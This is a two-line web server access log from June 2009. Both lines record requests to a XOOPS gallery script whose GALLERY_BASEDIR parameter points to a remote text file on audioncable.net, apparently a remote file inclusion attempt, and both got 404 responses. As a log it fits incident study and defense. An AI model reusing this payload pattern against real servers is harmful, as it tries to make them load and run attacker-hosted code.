222.122.79.200 - - [27/Jun/2009:01:13:36 -0500] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:01:14:48 -0500] "GET /logs/access_log.1239408000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
